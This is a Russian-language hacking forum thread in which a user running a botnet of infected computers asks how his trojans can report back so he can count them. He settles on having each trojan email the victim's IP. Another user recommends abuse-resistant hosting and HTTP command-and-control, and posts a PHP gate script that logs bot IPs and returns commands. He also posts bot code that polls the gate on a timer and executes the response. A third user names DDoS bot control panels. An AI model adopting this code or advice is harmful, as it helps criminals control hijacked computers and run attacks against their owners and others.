Ботнет - обратная связь.
|
|
wmFest | Дата: Суббота, 04.06.2011, 08:58 | Сообщение # 1 |
Частый гость
Статус: Offline
| Нужно вычислить численность заражённых компьютеров. Для этого я дам команду троянам скачать программку, которая 1 раз отошлёт мне что-нибудь. Таким образом каждый "зомби" отправит мне по 1 пакету, и я буду знать их численность. Только сервер мой находится на сайте юкоз и обратной связи я никак не предусмотрел. И теперь не знаю, как трояны могут сообщить мне о себе. Как? может написать трояна, который будет отсылать мне что-то по почте? или может который будет 1 раз тыкать кнопочку на сайте(а сайт будет вести подсчёт)? В общем как лучше организовать эту обратную связь..
если через почту, то я всё никак не могу отправить письмо через SMTP. а точнее не могу пройти авторизацию на mail.ru, если кто знает как, прошу помочь
Сообщение отредактировал dolphin - Суббота, 04.06.2011, 13:04 |
|
| |
wmFest | Дата: Суббота, 04.06.2011, 10:33 | Сообщение # 2 |
Частый гость
| ура! через почту получилось с помощью Доступно только для пользователей)
Доступно только для пользователей
наверно пусть так и будет.
Сообщение отредактировал dolphin - Суббота, 04.06.2011, 12:58 |
|
| |
vvova15 | Дата: Суббота, 04.06.2011, 10:34 | Сообщение # 3 |
Участник
| купи абузоустойчивый хостинг с поддержкой php и сделай управление через http . напиши гейт, к которому боты будут посылать запрос через определенный промежуток времени и гейт уже будет записывать данные посланные ему посредством get или post запроса. в ответ(через response) можно отдавать команду ботам, которую они будут парсить и выполнять
ICQ 185-398
|
|
| |
vvova15 | Дата: Суббота, 04.06.2011, 10:38 | Сообщение # 4 |
Участник
| насчет smtp - это смешно даже. где ты возьмеш столько мыльников если у тебя к примеру будет ботнет из 500к машин? и даже если и найдеш, то они тебе всю почту зафлудят. для централизованного ботнета самое нормальное управление это через irc или http.
ICQ 185-398
|
|
| |
wmFest | Дата: Суббота, 04.06.2011, 11:09 | Сообщение # 5 |
Частый гость
| smtp - я же не собираюсь управлять через мыло ими мне только для подсчёта количества. а управляю я через web сайт. пока решение в том, что я создал 1 мыло. и троян посылает письмо с ip зомби from мыло to это же самое мыло. 1 меня не радует - exe получился весом в 600кб, это смех а насчёт абузоустойчивого хостинга с php согласен, так в ближайшем будущем и сделаю) но пока раскошелиться ни на что не могу. поэтому для самого начала и юкоз сгодится)
Сообщение отредактировал wmFest - Суббота, 04.06.2011, 11:09 |
|
| |
vvova15 | Дата: Суббота, 04.06.2011, 17:50 | Сообщение # 6 |
Участник
| Quote (wmFest) а насчёт абузоустойчивого хостинга с php согласен, так в ближайшем будущем и сделаю) но пока раскошелиться ни на что не могу. поэтому для самого начала и юкоз сгодится) Тогда лучше уж hut.ru Или holm.ru - там хоть php есть. повесиш гейт и боты будут отсылать туда Ip: gate.php зальеш а хост: Code <? $f=fopen("log.txt","a+"); $s=$_SERVER["REMOTE_ADDR"]."\r\n"; fwrite($f,$s); fclose($f); echo "команда ботам"; ?> а в боте написать на событие таймера Code cmd:=idhttp1.get('http.//твой_сайт.hut2.ru/gate.php');//отправляем запрос на гейт exec_cmd(cmd);//выполняем полученную команду(exec_cmd - образная функция, которая как бы выполняет команду, посланную боту) так ты и ip-шники ботов запишеш в файл и команду заодно отдашь
ICQ 185-398
|
|
| |
gravitas | Дата: Суббота, 04.06.2011, 19:02 | Сообщение # 7 |
Авторитетный
| Посмотри админки ддос ботов: DeDaL, OunkBot, Optima, Гы-Bot.
TheDeduction Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
|
| |
wmFest | Дата: Воскресенье, 05.06.2011, 11:09 | Сообщение # 8 |
Частый гость
| vvova15, ок, так и сделаю, спасибо.
|
|
| |